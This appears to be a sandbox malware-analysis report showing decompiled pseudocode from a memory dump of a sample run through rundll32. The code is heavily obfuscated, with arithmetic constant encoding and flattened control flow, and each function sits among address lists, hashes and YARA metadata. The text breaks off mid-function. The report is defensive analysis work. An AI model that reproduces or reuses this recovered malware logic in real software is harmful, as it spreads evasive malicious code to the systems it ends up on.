				_v124 = _v124 + 0xffff24c4;
				_t307 = 0xc36eaf9;
				_t298 = 0x37;
				_v124 = _v124 * 0x2e;
				_v124 = _v124 ^ 0x020cf15c;
				_v176 = 0xedca77;
				_v176 = _v176 * 0x1f;
				_v176 = _v176 << 4;
				_v176 = _v176 + 0xdbf9;
				_v176 = _v176 ^ 0xccb922a9;
				_v120 = 0x5a606;
				_v120 = _v120 | 0xc9e49228;
				_t299 = 0x62;
				_v120 = _v120 / _t298;
				_v120 = _v120 ^ 0x03ad0d8c;
				_v144 = 0x918442;
				_v144 = _v144 >> 0xd;
				_v144 = _v144 * 0x3e;
				_v144 = _v144 + 0xa3d5;
				_v144 = _v144 ^ 0x0007140c;
				_v88 = 0x37923f;
				_v88 = _v88 ^ 0x32449291;
				_v88 = _v88 ^ 0x3276c44e;
				_v168 = 0xa5175f;
				_v168 = _v168 + 0x6cd0;
				_v168 = _v168 >> 0xd;
				_v168 = _v168 + 0x50d;
				_v168 = _v168 ^ 0x000b28ed;
				_v96 = 0x8bb9e8;
				_v96 = _v96 ^ 0x9313002a;
				_v96 = _v96 ^ 0x93929827;
				_v128 = 0x9b97bd;
				_v128 = _v128 >> 9;
				_v128 = _v128 + 0x506c;
				_v128 = _v128 ^ 0x0008f405;
				_v136 = 0x162b;
				_v136 = _v136 << 0xe;
				_v136 = _v136 ^ 0xcbe41246;
				_v136 = _v136 ^ 0xce6e1682;
				_v160 = 0xb72d70;
				_v160 = _v160 >> 8;
				_v160 = _v160 ^ 0x815bd7a2;
				_v160 = _v160 ^ 0x177336f3;
				_v160 = _v160 ^ 0x962c98d3;
				_v100 = 0xe545e5;
				_v100 = _v100 + 0xffffaae8;
				_v100 = _v100 | 0x514a639c;
				_v100 = _v100 ^ 0x51eea269;
				_v152 = 0xd9d32c;
				_v152 = _v152 >> 8;
				_v152 = _v152 ^ 0x78b07b8d;
				_v152 = _v152 / _t299;
				_v152 = _v152 ^ 0x01343475;
				_v92 = 0x6219a9;
				_v92 = _v92 << 8;
				_v92 = _v92 ^ 0x6210c938;
				_v80 = 0x3ff2a1;
				_v80 = _v80 + 0xffff7ea3;
				_v80 = _v80 ^ 0x003f2f73;
				_v164 = 0xe5565b;
				_v164 = _v164 + 0xffff5b62;
				_t300 = 0x78;
				_v164 = _v164 * 6;
				_v164 = _v164 / _t300;
				_v164 = _v164 ^ 0x000727eb;
				_v76 = 0x250d2;
				_v76 = _v76 | 0x8f851c12;
				_v76 = _v76 ^ 0x8f8220e2;
				_v116 = 0x568e;
				_v116 = _v116 ^ 0x3d61f204;
				_v116 = _v116 << 7;
				_v116 = _v116 ^ 0xb0d54eba;
				_v172 = 0xa5a4a3;
				_v172 = _v172 | 0xd2f7b266;
				_v172 = _v172 >> 0xd;
				_t301 = 0x7f;
				_v172 = _v172 * 0x30;
				_v172 = _v172 ^ 0x0132b547;
				_v112 = 0xd0329d;
				_v112 = _v112 * 0x58;
				_v112 = _v112 << 3;
				_v112 = _v112 ^ 0x3c81866c;
				_v104 = 0x844e69;
				_v104 = _v104 << 0xc;
				_v104 = _v104 >> 4;
				_v104 = _v104 ^ 0x0443b556;
				_v84 = 0x1d6374;
				_v84 = _v84 >> 0xd;
				_v84 = _v84 ^ 0x000df0de;
				_v148 = 0x6585fd;
				_v148 = _v148 / _t301;
				_t302 = 0x77;
				_v148 = _v148 / _t302;
				_v148 = _v148 >> 0xa;
				_v148 = _v148 ^ 0x000a9d1a;
				_v156 = 0xff5a31;
				_v156 = _v156 + 0xce45;
				_t303 = 0x29;
				_v156 = _v156 / _t303;
				_v156 = _v156 << 1;
				_v156 = _v156 ^ 0x0008392b;
				_v132 = 0x13d5b5;
				_v132 = _v132 << 0x10;
				_v132 = _v132 + 0xffff95f7;
				_v132 = _v132 ^ 0xd5b1b27f;
				_v108 = 0x3556bb;
				_v108 = _v108 * 0x4f;
				_v108 = _v108 + 0xffff90f3;
				_v108 = _v108 ^ 0x10791788;
				_v140 = 0x81de0d;
				_t304 = 0x6d;
				_v140 = _v140 / _t304;
				_v140 = _v140 + 0xf4b;
				_v140 = _v140 * 0x26;
				_v140 = _v140 ^ 0x002a9917;
				do {
					while(_t307 != 0x688d2d5) {
						if(_t307 == 0x8a4f536) {
							_t295 = E00355B0E(_a28, _v120,  &_v72, _v144);
							_t338 =  &(_t338[3]);
							__eflags = _t295;
							if(_t295 != 0) {
								_t307 = 0x688d2d5;
								continue;
							}
						} else {
							if(_t307 == 0x94a3104) {
								E00346E34(_v132, _v72, _v108, _v140);
							} else {
								if(_t307 != 0xc36eaf9) {
									goto L9;
								} else {
									_t307 = 0x8a4f536;
									continue;
								}
							}
						}
						L12:
						return _t335;
					}
					_push(_v128);
					_push(_v96);
					_push(_v168);
					_push(_v88);
					_t308 = 0x44;
					E00361310(_t308,  &_v68);
					_push(_v152);
					_v68 = 0x44;
					_push(_v100);
					_t309 = _v136;
					_push(0x341800);
					_v60 = E0034AB66(_v136, _v160, __eflags);
					__eflags = _v176 | _v124;
					_t335 = E0035C8BD(_v92, _v136, _v80, _v136, _t309, _v164, _v76, _a20, _v116, _t334, _a28, _v172, _v176 | _v124, 0, _v112,  &_v68, _v72, _v104);
					E0034AE03(_v84, _v148, _v156, _v60);
					_t338 =  &(_t338[0x1a]);
					_t307 = 0x94a3104;
					L9:
					__eflags = _t307 - 0xce6287b;
				} while (_t307 != 0xce6287b);
				goto L12;
			}














































                                                                                                                      0x00353647
                                                                                                                      0x00353650
                                                                                                                      0x00353652
                                                                                                                      0x00353653
                                                                                                                      0x0035365a
                                                                                                                      0x00353661
                                                                                                                      0x00353668
                                                                                                                      0x0035366f
                                                                                                                      0x00353676
                                                                                                                      0x00353677
                                                                                                                      0x00353678
                                                                                                                      0x0035367d
                                                                                                                      0x00353684
                                                                                                                      0x00353686
                                                                                                                      0x0035368e
                                                                                                                      0x00353691
                                                                                                                      0x003536a0
                                                                                                                      0x003536a7
                                                                                                                      0x003536aa
                                                                                                                      0x003536ae
                                                                                                                      0x003536b6
                                                                                                                      0x003536c3
                                                                                                                      0x003536c7
                                                                                                                      0x003536cc
                                                                                                                      0x003536d4
                                                                                                                      0x003536dc
                                                                                                                      0x003536e4
                                                                                                                      0x003536f2
                                                                                                                      0x003536f3
                                                                                                                      0x003536f7
                                                                                                                      0x003536ff
                                                                                                                      0x00353707
                                                                                                                      0x00353711
                                                                                                                      0x00353715
                                                                                                                      0x0035371d
                                                                                                                      0x00353725
                                                                                                                      0x0035372d
                                                                                                                      0x00353735
                                                                                                                      0x0035373d
                                                                                                                      0x00353745
                                                                                                                      0x0035374d
                                                                                                                      0x00353752
                                                                                                                      0x0035375a
                                                                                                                      0x00353762
                                                                                                                      0x0035376a
                                                                                                                      0x00353772
                                                                                                                      0x0035377a
                                                                                                                      0x00353782
                                                                                                                      0x00353787
                                                                                                                      0x0035378f
                                                                                                                      0x00353797
                                                                                                                      0x0035379f
                                                                                                                      0x003537a4
                                                                                                                      0x003537ac
                                                                                                                      0x003537b4
                                                                                                                      0x003537bc
                                                                                                                      0x003537c1
                                                                                                                      0x003537c9
                                                                                                                      0x003537d1
                                                                                                                      0x003537d9
                                                                                                                      0x003537e1
                                                                                                                      0x003537e9
                                                                                                                      0x003537f1
                                                                                                                      0x003537f9
                                                                                                                      0x00353801
                                                                                                                      0x00353806
                                                                                                                      0x00353818
                                                                                                                      0x0035381e
                                                                                                                      0x00353826
                                                                                                                      0x0035382e
                                                                                                                      0x00353833
                                                                                                                      0x0035383b
                                                                                                                      0x00353843
                                                                                                                      0x0035384b
                                                                                                                      0x00353853
                                                                                                                      0x0035385b
                                                                                                                      0x00353868
                                                                                                                      0x0035386b
                                                                                                                      0x00353877
                                                                                                                      0x0035387b
                                                                                                                      0x00353883
                                                                                                                      0x0035388b
                                                                                                                      0x00353893
                                                                                                                      0x0035389b
                                                                                                                      0x003538a3
                                                                                                                      0x003538ab
                                                                                                                      0x003538b0
                                                                                                                      0x003538b8
                                                                                                                      0x003538c0
                                                                                                                      0x003538c8
                                                                                                                      0x003538d2
                                                                                                                      0x003538d5
                                                                                                                      0x003538d9
                                                                                                                      0x003538e1
                                                                                                                      0x003538ee
                                                                                                                      0x003538f2
                                                                                                                      0x003538f7
                                                                                                                      0x003538ff
                                                                                                                      0x00353907
                                                                                                                      0x0035390c
                                                                                                                      0x00353911
                                                                                                                      0x00353919
                                                                                                                      0x00353921
                                                                                                                      0x00353926
                                                                                                                      0x0035392e
                                                                                                                      0x0035393e
                                                                                                                      0x00353946
                                                                                                                      0x0035394b
                                                                                                                      0x00353951
                                                                                                                      0x00353956
                                                                                                                      0x0035395e
                                                                                                                      0x00353966
                                                                                                                      0x00353972
                                                                                                                      0x00353975
                                                                                                                      0x00353979
                                                                                                                      0x0035397d
                                                                                                                      0x00353985
                                                                                                                      0x0035398d
                                                                                                                      0x00353992
                                                                                                                      0x0035399a
                                                                                                                      0x003539a2
                                                                                                                      0x003539af
                                                                                                                      0x003539b3
                                                                                                                      0x003539bb
                                                                                                                      0x003539c3
                                                                                                                      0x003539d8
                                                                                                                      0x003539e0
                                                                                                                      0x003539e4
                                                                                                                      0x003539f1
                                                                                                                      0x003539f5
                                                                                                                      0x003539fd
                                                                                                                      0x003539fd
                                                                                                                      0x00353a03
                                                                                                                      0x00353a35
                                                                                                                      0x00353a3a
                                                                                                                      0x00353a3d
                                                                                                                      0x00353a3f
                                                                                                                      0x00353a45
                                                                                                                      0x00000000
                                                                                                                      0x00353a45
                                                                                                                      0x00353a05
                                                                                                                      0x00353a0b
                                                                                                                      0x00353b31
                                                                                                                      0x00353a11
                                                                                                                      0x00353a17
                                                                                                                      0x00000000
                                                                                                                      0x00353a1d
                                                                                                                      0x00353a1d
                                                                                                                      0x00000000
                                                                                                                      0x00353a1d
                                                                                                                      0x00353a17
                                                                                                                      0x00353a0b
                                                                                                                      0x00353b39
                                                                                                                      0x00353b44
                                                                                                                      0x00353b44
                                                                                                                      0x00353a49
                                                                                                                      0x00353a54
                                                                                                                      0x00353a58
                                                                                                                      0x00353a5c
                                                                                                                      0x00353a62
                                                                                                                      0x00353a63
                                                                                                                      0x00353a68
                                                                                                                      0x00353a6c
                                                                                                                      0x00353a77
                                                                                                                      0x00353a7f
                                                                                                                      0x00353a83
                                                                                                                      0x00353a90
                                                                                                                      0x00353aac
                                                                                                                      0x00353af2
                                                                                                                      0x00353b03
                                                                                                                      0x00353b08
                                                                                                                      0x00353b0b
                                                                                                                      0x00353b10
                                                                                                                      0x00353b10
                                                                                                                      0x00353b10
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *$D$[V$lP$s/?$E
                                                                                                                      • API String ID: 0-4039435091
                                                                                                                      • Opcode ID: eefc1b96b308f5dd0d284d42c9b9e23fd3ef24c524faf0b115ccada09164afb0
                                                                                                                      • Instruction ID: 9829a83dc334245f6c5c8dadc4e73aa8e3202a60846d179dc031ee0c6ea672bd
                                                                                                                      • Opcode Fuzzy Hash: eefc1b96b308f5dd0d284d42c9b9e23fd3ef24c524faf0b115ccada09164afb0
                                                                                                                      • Instruction Fuzzy Hash: F9C11F715083809FD365CF64C98AA1BFBE1FBD8748F509A1DF6958A260C7B98948CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 003488F4 Relevance: 7.7, Strings: 6, Instructions: 235COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E003488F4(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _t258;
				signed int _t271;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				void* _t303;
				void* _t304;
				signed int* _t307;

				_t307 =  &_v1668;
				_v1644 = 0x34739e;
				_v1644 = _v1644 * 0x43;
				_t303 = __ecx;
				_v1644 = _v1644 >> 0xb;
				_t304 = 0x422d362;
				_t271 = 0x7d;
				_v1644 = _v1644 / _t271;
				_v1644 = _v1644 ^ 0x00084d9c;
				_v1612 = 0xb20ebf;
				_v1612 = _v1612 << 0xe;
				_v1612 = _v1612 ^ 0x83a04dde;
				_v1580 = 0xaa66ba;
				_v1580 = _v1580 + 0xffff0111;
				_v1580 = _v1580 ^ 0x00ac31ef;
				_v1604 = 0x4a91ac;
				_v1604 = _v1604 | 0x86032005;
				_v1604 = _v1604 ^ 0x86453654;
				_v1660 = 0x3cdcbf;
				_t272 = 0x34;
				_v1660 = _v1660 / _t272;
				_v1660 = _v1660 << 9;
				_t273 = 0x19;
				_v1660 = _v1660 * 0x33;
				_v1660 = _v1660 ^ 0x776ddfce;
				_v1620 = 0xfdfe87;
				_v1620 = _v1620 | 0x8debc5e9;
				_v1620 = _v1620 ^ 0x8df4241a;
				_v1596 = 0xc5e4de;
				_v1596 = _v1596 / _t273;
				_v1596 = _v1596 ^ 0x000ab9e2;
				_v1568 = 0x4c47da;
				_v1568 = _v1568 + 0x5d3c;
				_v1568 = _v1568 ^ 0x0043a9f3;
				_v1564 = 0xed5f6a;
				_t274 = 0x2a;
				_v1564 = _v1564 / _t274;
				_v1564 = _v1564 ^ 0x00049b09;
				_v1588 = 0xe27f75;
				_t275 = 0x68;
				_v1588 = _v1588 * 0x15;
				_v1588 = _v1588 ^ 0x129f57f0;
				_v1572 = 0x58913e;
				_v1572 = _v1572 + 0xffff0520;
				_v1572 = _v1572 ^ 0x005b93ab;
				_v1648 = 0xac4e73;
				_v1648 = _v1648 >> 8;
				_v1648 = _v1648 >> 0x10;
				_v1648 = _v1648 << 3;
				_v1648 = _v1648 ^ 0x000ac3bf;
				_v1668 = 0x5a6a4e;
				_t90 =  &_v1668; // 0x5a6a4e
				_v1668 =  *_t90 * 0x58;
				_t92 =  &_v1668; // 0x5a6a4e
				_v1668 =  *_t92 / _t275;
				_v1668 = _v1668 << 1;
				_v1668 = _v1668 ^ 0x009738dd;
				_v1640 = 0x7a6607;
				_t276 = 0x65;
				_v1640 = _v1640 * 0xa;
				_v1640 = _v1640 >> 9;
				_v1640 = _v1640 | 0xf246f931;
				_v1640 = _v1640 ^ 0xf242cc5d;
				_v1628 = 0xa390c8;
				_v1628 = _v1628 << 0xf;
				_v1628 = _v1628 ^ 0x3ac7d651;
				_v1628 = _v1628 ^ 0xf2afedad;
				_v1652 = 0x2d980b;
				_v1652 = _v1652 * 0x71;
				_v1652 = _v1652 * 0x17;
				_v1652 = _v1652 ^ 0x28f4da4d;
				_v1652 = _v1652 ^ 0xe6141d35;
				_v1636 = 0x37785c;
				_v1636 = _v1636 + 0xffffcffd;
				_v1636 = _v1636 ^ 0x6b7d5c73;
				_v1636 = _v1636 ^ 0x6b457d84;
				_v1616 = 0xb1620;
				_v1616 = _v1616 << 0x10;
				_v1616 = _v1616 ^ 0x162b8e46;
				_v1632 = 0x4c47;
				_v1632 = _v1632 + 0xffffc0f0;
				_v1632 = _v1632 + 0xffffd3bf;
				_v1632 = _v1632 ^ 0xfff44e1b;
				_v1664 = 0xa6b80c;
				_v1664 = _v1664 + 0xf763;
				_v1664 = _v1664 * 0x6e;
				_v1664 = _v1664 / _t276;
				_v1664 = _v1664 ^ 0x00b9c638;
				_v1600 = 0xaa0054;
				_v1600 = _v1600 ^ 0xf2e3595a;
				_v1600 = _v1600 ^ 0xf24e3ce3;
				_v1608 = 0x669547;
				_v1608 = _v1608 + 0xe3ee;
				_v1608 = _v1608 ^ 0x0066aeed;
				_v1656 = 0xf50b8d;
				_v1656 = _v1656 + 0xffffe5b9;
				_v1656 = _v1656 * 0x19;
				_v1656 = _v1656 * 0x2c;
				_v1656 = _v1656 ^ 0x1c789090;
				_v1576 = 0xf13773;
				_v1576 = _v1576 | 0xffe45fc0;
				_v1576 = _v1576 ^ 0xfffeb9af;
				_v1624 = 0xc714fc;
				_v1624 = _v1624 << 7;
				_v1624 = _v1624 * 0x4d;
				_v1624 = _v1624 ^ 0xf0acb0c0;
				_v1584 = 0x43b9ac;
				_v1584 = _v1584 + 0xfffff1bc;
				_v1584 = _v1584 ^ 0x004aa621;
				_v1592 = 0x5bf493;
				_t258 = _v1592 * 0x43;
				_v1592 = _t258;
				_v1592 = _v1592 ^ 0x181e9f62;
				while(_t304 != 0x2953b22) {
					if(_t304 == 0x422d362) {
						_t304 = 0xe704baa;
						continue;
					} else {
						_t312 = _t304 - 0xe704baa;
						if(_t304 != 0xe704baa) {
							L8:
							__eflags = _t304 - 0x740d40c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E003612A8(_t276, _v1644, _t312, _v1612, _v1580,  &_v1560);
							 *((short*)(E00354FA8(_v1604,  &_v1560, _v1660, _v1620))) = 0;
							E00348650(_v1596,  &_v520, _t312, _v1568);
							_push(_v1648);
							_push(_v1572);
							_push(0x34183c);
							E0034E7CE(E0034AB66(_v1564, _v1588, _t312), _t312, _v1668,  &_v1560, _v1564, _v1640, _v1628, _v1652, _v1636,  &_v520);
							E0034AE03(_v1616, _v1632, _v1664, _t264);
							_t276 = _v1600;
							_t258 = E0035C38F(_t276,  &_v1040, _t303, _v1608);
							_t307 =  &(_t307[0x15]);
							if(_t258 != 0) {
								_t304 = 0x2953b22;
								continue;
							}
						}
					}
					return _t258;
				}
				_push(_v1592);
				_push(_v1584);
				_push(_v1624);
				_push( &_v1040);
				_push(0);
				_push(_v1576);
				_push(_t276);
				_push(0);
				_t276 = 0;
				__eflags = 0;
				_t258 = E00349700(0, _v1656, 0);
				_t307 =  &(_t307[8]);
				_t304 = 0x740d40c;
				goto L8;
			}











































                                                                                                                      0x003488f4
                                                                                                                      0x003488fa
                                                                                                                      0x0034890d
                                                                                                                      0x00348911
                                                                                                                      0x00348913
                                                                                                                      0x00348918
                                                                                                                      0x00348923
                                                                                                                      0x00348928
                                                                                                                      0x0034892e
                                                                                                                      0x00348936
                                                                                                                      0x0034893e
                                                                                                                      0x00348943
                                                                                                                      0x0034894b
                                                                                                                      0x00348953
                                                                                                                      0x0034895b
                                                                                                                      0x00348963
                                                                                                                      0x0034896b
                                                                                                                      0x00348973
                                                                                                                      0x0034897b
                                                                                                                      0x00348987
                                                                                                                      0x0034898c
                                                                                                                      0x00348992
                                                                                                                      0x0034899c
                                                                                                                      0x0034899f
                                                                                                                      0x003489a3
                                                                                                                      0x003489ab
                                                                                                                      0x003489b3
                                                                                                                      0x003489bb
                                                                                                                      0x003489c3
                                                                                                                      0x003489d3
                                                                                                                      0x003489d7
                                                                                                                      0x003489df
                                                                                                                      0x003489e7
                                                                                                                      0x003489ef
                                                                                                                      0x003489f7
                                                                                                                      0x00348a03
                                                                                                                      0x00348a08
                                                                                                                      0x00348a0e
                                                                                                                      0x00348a16
                                                                                                                      0x00348a23
                                                                                                                      0x00348a24
                                                                                                                      0x00348a28
                                                                                                                      0x00348a30
                                                                                                                      0x00348a38
                                                                                                                      0x00348a40
                                                                                                                      0x00348a48
                                                                                                                      0x00348a50
                                                                                                                      0x00348a55
                                                                                                                      0x00348a5a
                                                                                                                      0x00348a5f
                                                                                                                      0x00348a67
                                                                                                                      0x00348a6f
                                                                                                                      0x00348a74
                                                                                                                      0x00348a78
                                                                                                                      0x00348a7e
                                                                                                                      0x00348a82
                                                                                                                      0x00348a86
                                                                                                                      0x00348a90
                                                                                                                      0x00348aa9
                                                                                                                      0x00348aaa
                                                                                                                      0x00348aae
                                                                                                                      0x00348ab3
                                                                                                                      0x00348abb
                                                                                                                      0x00348ac3
                                                                                                                      0x00348acb
                                                                                                                      0x00348ad0
                                                                                                                      0x00348ad8
                                                                                                                      0x00348ae0
                                                                                                                      0x00348aed
                                                                                                                      0x00348af6
                                                                                                                      0x00348afa
                                                                                                                      0x00348b02
                                                                                                                      0x00348b0a
                                                                                                                      0x00348b12
                                                                                                                      0x00348b1a
                                                                                                                      0x00348b22
                                                                                                                      0x00348b2a
                                                                                                                      0x00348b32
                                                                                                                      0x00348b37
                                                                                                                      0x00348b3f
                                                                                                                      0x00348b47
                                                                                                                      0x00348b4f
                                                                                                                      0x00348b57
                                                                                                                      0x00348b5f
                                                                                                                      0x00348b67
                                                                                                                      0x00348b74
                                                                                                                      0x00348b7e
                                                                                                                      0x00348b82
                                                                                                                      0x00348b8a
                                                                                                                      0x00348b92
                                                                                                                      0x00348b9a
                                                                                                                      0x00348ba2
                                                                                                                      0x00348baa
                                                                                                                      0x00348bb2
                                                                                                                      0x00348bba
                                                                                                                      0x00348bc2
                                                                                                                      0x00348bcf
                                                                                                                      0x00348bd8
                                                                                                                      0x00348bdc
                                                                                                                      0x00348be4
                                                                                                                      0x00348bec
                                                                                                                      0x00348bf4
                                                                                                                      0x00348bfc
                                                                                                                      0x00348c04
                                                                                                                      0x00348c0e
                                                                                                                      0x00348c12
                                                                                                                      0x00348c1a
                                                                                                                      0x00348c22
                                                                                                                      0x00348c2a
                                                                                                                      0x00348c32
                                                                                                                      0x00348c3a
                                                                                                                      0x00348c3f
                                                                                                                      0x00348c43
                                                                                                                      0x00348c4b
                                                                                                                      0x00348c59
                                                                                                                      0x00348d44
                                                                                                                      0x00000000
                                                                                                                      0x00348c5f
                                                                                                                      0x00348c5f
                                                                                                                      0x00348c61
                                                                                                                      0x00348d7e
                                                                                                                      0x00348d7e
                                                                                                                      0x00348d84
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00348c67
                                                                                                                      0x00348c78
                                                                                                                      0x00348ca5
                                                                                                                      0x00348cac
                                                                                                                      0x00348cb1
                                                                                                                      0x00348cb5
                                                                                                                      0x00348cca
                                                                                                                      0x00348d07
                                                                                                                      0x00348d19
                                                                                                                      0x00348d22
                                                                                                                      0x00348d31
                                                                                                                      0x00348d36
                                                                                                                      0x00348d3b
                                                                                                                      0x00348d3d
                                                                                                                      0x00000000
                                                                                                                      0x00348d3d
                                                                                                                      0x00348d3b
                                                                                                                      0x00348c61
                                                                                                                      0x00348d94
                                                                                                                      0x00348d94
                                                                                                                      0x00348d4b
                                                                                                                      0x00348d56
                                                                                                                      0x00348d5a
                                                                                                                      0x00348d5e
                                                                                                                      0x00348d5f
                                                                                                                      0x00348d61
                                                                                                                      0x00348d6c
                                                                                                                      0x00348d6d
                                                                                                                      0x00348d6f
                                                                                                                      0x00348d6f
                                                                                                                      0x00348d71
                                                                                                                      0x00348d76
                                                                                                                      0x00348d79
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: <]$GL$NjZ$T$j_$s\}k
                                                                                                                      • API String ID: 0-1588241565
                                                                                                                      • Opcode ID: 8bf30cfddf8310c356da1ac5e4956eecff08760b2ad9b4cc132c7481cd103e21
                                                                                                                      • Instruction ID: 546c48bfe92b58ac2774b94d64814887bd0373cdcf31733bb2c9e4a74a36e98d
                                                                                                                      • Opcode Fuzzy Hash: 8bf30cfddf8310c356da1ac5e4956eecff08760b2ad9b4cc132c7481cd103e21
                                                                                                                      • Instruction Fuzzy Hash: 5AC1FE724093419FC369CF25C58A94BFBE1FBC4708F008A1DF5A69A260D7B59A19CF87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 003470ED Relevance: 7.7, Strings: 6, Instructions: 219COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E003470ED() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _t202;
				signed int _t203;
				void* _t204;
				intOrPtr _t209;
				intOrPtr _t216;
				void* _t218;
				intOrPtr _t224;
				intOrPtr _t236;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				void* _t246;
				signed int* _t248;
				void* _t251;

				_t248 =  &_v612;
				_v540 = 0xdad4cc;
				_v540 = _v540 ^ 0x94191629;
				_t218 = 0x6f2f9f8;
				_v540 = _v540 ^ 0x94c3c2f9;
				_v544 = 0x76e0f0;
				_v544 = _v544 << 0x10;
				_v544 = _v544 ^ 0xe0f00029;
				_v536 = 0x3bc67a;
				_v536 = _v536 >> 0xc;
				_v536 = _v536 ^ 0x000f0383;
				_v568 = 0x8bde3b;
				_v568 = _v568 + 0xffff2322;
				_v568 = _v568 ^ 0x008d993e;
				_v596 = 0x92619;
				_v596 = _v596 ^ 0xd159791b;
				_v596 = _v596 + 0xffff3449;
				_v596 = _v596 | 0x988058a4;
				_v596 = _v596 ^ 0xd9ccc0e1;
				_v608 = 0xa06713;
				_t241 = 0x29;
				_v608 = _v608 / _t241;
				_v608 = _v608 ^ 0x6a345d45;
				_t246 = 0;
				_v608 = _v608 << 0xe;
				_v608 = _v608 ^ 0xed3298df;
				_v576 = 0x1c835f;
				_v576 = _v576 ^ 0xdf607740;
				_v576 = _v576 >> 0xb;
				_v576 = _v576 ^ 0x0012ec93;
				_v584 = 0x7ddda5;
				_t242 = 0x76;
				_v584 = _v584 / _t242;
				_v584 = _v584 | 0x464a7126;
				_v584 = _v584 ^ 0x4642215f;
				_v548 = 0x20374d;
				_t243 = 0x71;
				_v548 = _v548 * 0x6c;
				_v548 = _v548 ^ 0x0d9d239d;
				_v528 = 0x9116;
				_v528 = _v528 ^ 0x0b2a50da;
				_v528 = _v528 ^ 0x0b2b7a92;
				_v600 = 0xee9b3a;
				_v600 = _v600 | 0x1ae7cac3;
				_v600 = _v600 + 0x2aec;
				_v600 = _v600 | 0xe5d5fb71;
				_v600 = _v600 ^ 0xfffe899a;
				_v556 = 0x2fd7b1;
				_v556 = _v556 / _t243;
				_v556 = _v556 ^ 0x0001ae08;
				_v552 = 0xd06bd7;
				_v552 = _v552 + 0x9aba;
				_v552 = _v552 ^ 0x00dba68b;
				_v560 = 0x3f6698;
				_v560 = _v560 ^ 0x9e976c20;
				_v560 = _v560 ^ 0x9ea088a0;
				_v564 = 0xf04caf;
				_v564 = _v564 << 0xc;
				_v564 = _v564 ^ 0x04c86801;
				_v532 = 0x4abe1e;
				_v532 = _v532 + 0xffff7e54;
				_v532 = _v532 ^ 0x0047677c;
				_v592 = 0xfc3d76;
				_v592 = _v592 >> 4;
				_t244 = 0x67;
				_t245 = _v524;
				_v592 = _v592 / _t244;
				_v592 = _v592 ^ 0x0e63bcd1;
				_v592 = _v592 ^ 0x0e6c0c0a;
				_v580 = 0x87074e;
				_v580 = _v580 + 0x3b8f;
				_v580 = _v580 + 0xffffa265;
				_v580 = _v580 ^ 0x008cb1a6;
				_v588 = 0xe717aa;
				_v588 = _v588 | 0xfff18f7b;
				_v588 = _v588 >> 0xb;
				_v588 = _v588 ^ 0x001226f1;
				_v604 = 0x61f630;
				_v604 = _v604 | 0xec5f2186;
				_v604 = _v604 ^ 0x97c62f9e;
				_v604 = _v604 ^ 0x80f94e8c;
				_v604 = _v604 ^ 0xfb4d53d4;
				_v612 = 0x890e92;
				_v612 = _v612 >> 9;
				_v612 = _v612 + 0xf9d4;
				_v612 = _v612 + 0xffff7e3c;
				_v612 = _v612 ^ 0x000167a4;
				_v572 = 0xa3f922;
				_v572 = _v572 << 1;
				_v572 = _v572 + 0x9b39;
				_v572 = _v572 ^ 0x014464a5;
				goto L1;
				do {
					while(1) {
						L1:
						_t251 = _t218 - 0xaf66d96;
						if(_t251 > 0) {
							break;
						}
						if(_t251 == 0) {
							_push(_t218);
							_t236 =  *0x36520c; // 0x0
							_t203 = E0034EA7B(_t236 + 8, _v552, _v524, _t218, _v560, _v564, _v532);
							_t248 =  &(_t248[7]);
							_t218 = 0xbcbad55;
							__eflags = _t203;
							_t204 = 1;
							_t246 =  ==  ? _t204 : _t246;
							continue;
						}
						if(_t218 == 0x1700698) {
							E0035E689(_v548, _v528, _v600, _t245, _v556);
							_t248 =  &(_t248[3]);
							L9:
